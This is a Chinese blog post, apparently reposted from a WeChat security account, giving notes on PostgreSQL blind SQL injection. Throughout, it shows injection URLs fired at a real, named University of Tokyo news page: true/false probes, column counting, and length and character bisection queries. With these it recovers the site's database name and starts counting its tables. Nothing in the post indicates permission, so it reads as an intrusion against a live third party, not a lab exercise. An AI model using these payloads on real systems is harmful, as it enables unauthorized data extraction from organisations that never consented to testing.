PostgreSQL盲注笔记一

  • A+
所属分类:安全文章

注入点: 


复制代码

http://www.u-tokyo.ac.jp/news/detail_e.html?id=13072



复制代码

http://www.u-tokyo.ac.jp/news/detail_e.html?id=13072 and 1=1 正常 http://www.u-tokyo.ac.jp/news/detail_e.html?id=13072 and 1=2 错误

工具判断注入的方法: 


复制代码

http://www.u-tokyo.ac.jp/news/detail_e.html?id=13072 aNd(6=6)  6=6  正确   http://www.u-tokyo.ac.jp/news/detail_e.html?id=13072 aNd(6=7)  6=7  错误

猜字段数: 


http://www.u-tokyo.ac.jp/news/detail_e.html?id=13072 order by 15--正常 
http://www.u-tokyo.ac.jp/news/detail_e.html?id=13072 order by 16-- 错误了 
但是可悲的是union select 不可以用0.0 
那么这样正常: 

复制代码

http://www.u-tokyo.ac.jp/news/detail_e.html?id=13072 and (select length(current_database())) between 0 and 30

意思是检测数据库的长度在是否在:between 0 and 30之间,是的话就返回正确,错误的话就返回错误 
错误: 

复制代码

http://www.u-tokyo.ac.jp/news/detail_e.html?id=13072 and (select length(current_database())) between 0 and 7

说明数据库名的长度不在0-7之间 
正常: 

复制代码

http://www.u-tokyo.ac.jp/news/detail_e.html?id=13072 and (select length(current_database())) between 7 and 11


正常:
复制代码

/news/detail_e.html?id=13072 and (select length(current_database())) between 8 and 8



说明数据库名的长度为8  接下来我们来看看数据库名是什么 
这两个正常 

复制代码

http://www.u-tokyo.ac.jp/news/detail_e.html?id=13072 and (select ascii(substr(current_database(),1,1))) between 0 and 32768 http://www.u-tokyo.ac.jp/news/detail_e.html?id=13072 and (select ascii(substr(current_database(),1,1))) between 0 and 16384

这两个错误: 


复制代码

http://www.u-tokyo.ac.jp/news/detail_e.html?id=13072 and (select ascii(substr(current_database(),1,1))) between 0 and 64  http://www.u-tokyo.ac.jp/news/detail_e.html?id=13072 and (select ascii(substr(current_database(),1,1))) between 64 and 96

正常: 


复制代码

http://www.u-tokyo.ac.jp/news/detail_e.html?id=13072 and (select ascii(substr(current_database(),1,1))) between 117 and 117

好我们猜到了数据库第一个字符的ascii只是:117 

我们来猜第二个: 

复制代码

http://www.u-tokyo.ac.jp/news/detail_e.html?id=13072 and (select ascii(substr(current_database(),2,1))) between 0 and 32768

一直下去就能把数据库弄出来了、、、、 

结果是:utokyodb 


ok我们接下来的人物是猜出表名、、 
我们先来看看有多少个表、、 
看两个正常: 

复制代码

http://www.u-tokyo.ac.jp/news/detail_e.html?id=13072 and (select count(*) from pg_stat_user_tables) between 0 and 2000 http://www.u-tokyo.ac.jp/news/detail_e.html?id=13072 and (select count(*) from pg_stat_user_tables) between 20and 20


本文始发于微信公众号(飓风网络安全):PostgreSQL盲注笔记一

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: